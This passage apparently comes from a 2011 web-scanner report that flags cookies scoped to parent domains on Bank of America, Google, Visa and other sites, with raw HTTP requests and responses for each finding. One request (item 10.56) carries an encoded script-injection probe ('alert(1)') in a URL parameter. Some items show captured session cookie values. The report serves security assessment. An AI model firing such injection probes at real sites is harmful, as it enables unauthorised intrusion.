Location: https://s.xp1.ru4.com/images/pixel.gif
Content-length: 0
Connection: close


10.50. https://sitekey.bankofamerica.com/sas/resetIDScreen.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sitekey.bankofamerica.com
Path:   /sas/resetIDScreen.do

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sas/resetIDScreen.do HTTP/1.1
Host: sitekey.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:02:35 GMT
Content-type: text/html
Set-Cookie: TLTSID=244C13942F18102F3BD996FBE0492B85; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=244C13942F18102F3BD996FBE0492B85; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:02:35 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: no-cache="set-cookie,set-cookie2"
P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Location: http://www.bankofamerica.com/state.cgi?section=gslsignin&update=yes
Content-language: en-US
Set-cookie: GSLSESSIONID=0000s0eMf9y2EnRfOFlN2C8I1eP:13k5uohoo; Path=/
Connection: close


10.51. https://sitekey.bankofamerica.com/sas/resetPasscodeScreen.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sitekey.bankofamerica.com
Path:   /sas/resetPasscodeScreen.do

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sas/resetPasscodeScreen.do HTTP/1.1
Host: sitekey.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:02:35 GMT
Content-type: text/html
Set-Cookie: TLTSID=2452CCDE2F18102F3BDB96FBE0492B85; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=2452CCDE2F18102F3BDB96FBE0492B85; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:02:35 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: no-cache="set-cookie,set-cookie2"
P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Location: http://www.bankofamerica.com/state.cgi?section=gslsignin&update=yes
Content-language: en-US
Set-cookie: GSLSESSIONID=0000kF4ME17cVzwHT7rf0vMZses:13k5uolvs; Path=/
Connection: close


10.52. https://sitekey.bankofamerica.com/sas/signon.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sitekey.bankofamerica.com
Path:   /sas/signon.do

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sas/signon.do HTTP/1.1
Host: sitekey.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:02:35 GMT
Content-type: text/html
Set-Cookie: TLTSID=2465625E2F18102F3BDD96FBE0492B85; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=2465625E2F18102F3BDD96FBE0492B85; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:02:35 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: no-cache="set-cookie,set-cookie2"
P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Location: http://www.bankofamerica.com/state.cgi?section=gslsignin&update=yes
Content-language: en-US
Set-cookie: GSLSESSIONID=0000xqKx0Pm6KLlxeiVVja8EmdE:13k5uoqt5; Path=/
Connection: close


10.53. http://solutions.liveperson.com/ref/lppb.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.liveperson.com
Path:   /ref/lppb.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Thu, 03 Feb 2011 01:04:58 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Location: pbl.asp
Content-Length: 128
Content-Type: text/html
Set-Cookie: visitor=ref=LP+Power+%2D+; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQSDTDCQS=BDCPFOICCKLENOGJKIBLOLMG; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="pbl.asp">here</a>.</body>

10.54. http://stg.xp1.ru4.com/meta  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stg.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta HTTP/1.1
Host: stg.xp1.ru4.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 02 Feb 2011 22:02:37 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: X1ID=ZA-00000000023314500; domain=.ru4.com; path=/; expires=Wed, 02-Aug-2012 17:02:37 GMT
Location: http://stg.xp1.ru4.com/images/pixel.gif
Content-length: 0
Connection: close


10.55. https://stg.xp1.ru4.com/meta  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://stg.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta HTTP/1.1
Host: stg.xp1.ru4.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 02 Feb 2011 22:02:37 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: X1ID=ZA-00000000023314508; domain=.ru4.com; path=/; expires=Wed, 02-Aug-2012 17:02:37 GMT
Location: https://stg.xp1.ru4.com/images/pixel.gif
Content-length: 0
Connection: close


10.56. http://tc.bankofamerica.com/i  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tc.bankofamerica.com
Path:   /i

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /i?siteID=429&ts=1296684340039&location=http%3A%2F%2Fwww.bankofamerica.com%2Ffindit%2Ferror.cgi%3FBOA_0020%3D20110202%3A0%3AO%3A5067fc0c-5451-405a-bffc3c21dd627de9%26state%3Dfalse%26BA_0021%3Dfalse&tagv=4.3&tz=-360&r=http%3A%2F%2Fwww.bankofamerica.com%2Fvehicle_and_personal_loans544ce%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E45ae18a6011%2Findex.cfm&title=Bank%20of%20America%20%7C%20Please%20Try%20Again&cd=16&ah=1156&aw=1920&sh=1200&sw=1920&pd=16 HTTP/1.1
Host: tc.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/findit/error.cgi
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; throttle_value=21

Response

HTTP/1.1 200 OK
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Wed, 02 Feb 2011 22:04:41 GMT
Last-Modified: Wed, 02 Feb 2011 22:04:41 GMT
P3P: policyref="http://www.touchclarity.com/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR STP UNI PUR COM NAV INT STA PRE"
Set-Cookie: TCID=0007ae71-9ad3-3b5c-9719-884700000028;path=/;domain=bankofamerica.com;expires=Sat, 02-Feb-2013 22:04:41 GMT;
Connection: Keep-Alive
Content-Length: 43
Content-Type: image/gif
Set-Cookie: NSC_CbolPgBnfsjdb=445b32097852;expires=Thu, 03-Feb-11 02:04:42 GMT;path=/;domain=bankofamerica.com

GIF89a.............!.......,............Q.;

10.57. https://tc.bankofamerica.com/c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://tc.bankofamerica.com
Path:   /c

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c?siteid=429&ccID=BOA_HOME_SIGNON_SERVICE_01&ccID=BOA_HOME_SIGNON_SERVICE_02&ccID=BOA_HOME_SIGNON_SERVICE_03&ccID=BOA_HOME_SIGNON_HERO&location=https%3A%2F%2Fwww.bankofamerica.com%2Fhomepage%2Foverview.go%3FBOA_0020%3D999%26tc_lang%3Den_US%26state%3Dnull%26BA_0021%3Dnull%26BOA_HPR%3Dnull HTTP/1.1
Host: tc.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Wed, 02 Feb 2011 22:02:37 GMT
Last-Modified: Wed, 02 Feb 2011 22:02:37 GMT
P3P: policyref="http://www.touchclarity.com/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR STP UNI PUR COM NAV INT STA PRE"
Set-Cookie: TCID=0007ae71-99a3-d958-8d17-88470000005a;path=/;domain=bankofamerica.com;expires=Sat, 02-Feb-2013 22:02:37 GMT;
Connection: Keep-Alive
Content-Length: 563
Content-Type: text/javascript; charset=ISO-8859-1
Set-Cookie: NSC_CbolPgBnfsjdb=445b32097852;expires=Thu, 03-Feb-11 02:02:38 GMT;path=/;domain=bankofamerica.com

callback({"ccid":
[
{"id": "BOA_HOME_SIGNON_HERO", "ds": [{"name": "Default1", "id": "13D1F2F5-B076-11DF-9D4F-00144F3EA4A4" , "coid" : "OGU5CH52"}]},{"id": "BOA_HOME_SIGNON_SERVICE_01", "ds": [{"na
...[SNIP]...

10.58. http://translate.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:05:04 GMT
Expires: Thu, 03 Feb 2011 01:05:04 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=1bec15895da74ab0:TM=1296695104:LM=1296695104:S=GaVtpWsLtBVoNxSV; expires=Sat, 02-Feb-2013 01:05:04 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...

10.59. http://translate.google.com/translate_t  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /translate_t

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /translate_t?q=ipboard+software&um=1&ie=UTF-8&sa=N&hl=en&tab=wT HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:05:02 GMT
Expires: Thu, 03 Feb 2011 01:05:02 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=25ad30bb14812802:TM=1296695102:LM=1296695102:S=SmhVQvsJtj0-g9k_; expires=Sat, 02-Feb-2013 01:05:02 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...

10.60. http://usa.visa.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usa.visa.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?country=us&ep=v_gg_new&akamai=true HTTP/1.1
Host: usa.visa.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 18 Jan 2011 22:19:37 GMT
Accept-Ranges: bytes
ETag: "8062a7ca5db7cb1:0"
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Date: Wed, 02 Feb 2011 21:58:59 GMT
Connection: close
Set-Cookie: visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000; expires=Wed, 1-Jan-2020 23:59:59 GMT; path=/; domain=.visa.com
Set-Cookie: visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; path=/; domain=.visa.com
P3P:
Content-Length: 10831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content
...[SNIP]...

10.61. http://video.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.google.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: video.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 01:05:06 GMT
Expires: Thu, 03 Feb 2011 01:05:06 GMT
Cache-Control: private, max-age=0
Set-Cookie: PREF=ID=451bdac0aa428edb:TM=1296695106:LM=1296695106:S=qUfuqTtbKJhEKHvk; expires=Sat, 02-Feb-2013 01:05:06 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: VSFE_1.0
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html>
<meta content="text/html; charset=UTF-8" http-equiv=content-type>
<meta content="Search millions of videos from across the web." name=description>
<title>Google Videos</title>
<script>
...[SNIP]...

10.62. http://www.abc.net.au/news/stories/2011/01/20/3117032.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /news/stories/2011/01/20/3117032.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/stories/2011/01/20/3117032.htm HTTP/1.1
Host: www.abc.net.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Cache-Control: max-age=300
Expires: Thu, 03 Feb 2011 01:10:09 GMT
Date: Thu, 03 Feb 2011 01:05:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ABCGuestID=24.143.206.110.73161296695109607; expires=Thu, 03-Feb-2011 01:35:09 GMT; path=/; domain=abc.net.au
Content-Length: 41425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xht
...[SNIP]...

10.63. http://www.abc.net.au/rural/news/content/201102/s3126694.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /rural/news/content/201102/s3126694.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rural/news/content/201102/s3126694.htm HTTP/1.1
Host: www.abc.net.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Cache-Control: max-age=300
Expires: Thu, 03 Feb 2011 01:10:08 GMT
Date: Thu, 03 Feb 2011 01:05:08 GMT
Content-Length: 10862
Connection: close
Set-Cookie: ABCGuestID=24.143.206.110.73161296695108706; expires=Thu, 03-Feb-2011 01:35:08 GMT; path=/; domain=abc.net.au

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>

<title>Tuna industry seeks lift in quotas, after boom se
...[SNIP]...

10.64. http://www.bankofamerica.com/creditcards/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /creditcards/index.cfm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /creditcards/index.cfm?template=manage_card&RequestTimeout=120 HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:35:17 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Page-Completion-Status: Normal
Page-Completion-Status: Normal
Set-Cookie: CCPATH=Affiliate; path=/; domain=.bankofamerica.com;
Set-Cookie: CONTEXT=; expires=Mon, 03-Jan-2011 22:35:11 GMT; path=/;
Set-Cookie: TRACKING_CODE=; path=/;
Connection: close


                                                                                                                                                                   <style>

.page-title_1 {
color:#D4001A;
font-size:145%;
fo
...[SNIP]...

10.65. http://www.bankofamerica.com/help/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /help/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/ HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:22 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Page-Completion-Status: Normal
Page-Completion-Status: Normal
Set-Cookie: CFID=132934232; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: CFTOKEN=4303b0d%2D0003b41a%2Dd4aa%2D1d49%2Da6b8%2D83deedcb0000; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: GEOSERVER=1; path=/;
Set-Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; expires=Tue, 02-Aug-2011 00:00:00 GMT; path=/; domain=.bankofamerica.com;
Set-Cookie: SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN; path=/; domain=.bankofamerica.com;
Connection: close
Set-Cookie: BIGipServerngen-www.80=3064379051.20480.0000; path=/


                                                                               <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- WR26075 -->


<!-- WR26075 -->


                                   
...[SNIP]...

10.66. http://www.bankofamerica.com/help/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /help/index.cfm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:33:14 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Page-Completion-Status: Normal
Page-Completion-Status: Normal
Set-Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; expires=Tue, 02-Aug-2011 00:00:00 GMT; path=/; domain=.bankofamerica.com;
Set-Cookie: SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN; path=/; domain=.bankofamerica.com;
Connection: close


                                                                           <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- WR26075 -->


<!-- WR26075 -->


                                       
...[SNIP]...

10.67. https://www.bankofamerica.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:22 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=D98FA69C2F17102F856AA91CC30F81BB; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:00:22 GMT
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; Path=/
Set-Cookie: BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; Expires=Sun, 02 Feb 2031 22:00:22 GMT; Path=/; Domain=.bankofamerica.com
Set-Cookie: CONTEXT=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: INTL_LANG=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: LANG_COOKIE=en_US; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 48180


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...

10.68. https://www.bankofamerica.com/credit-cards/cardoverview.action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /credit-cards/cardoverview.action

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

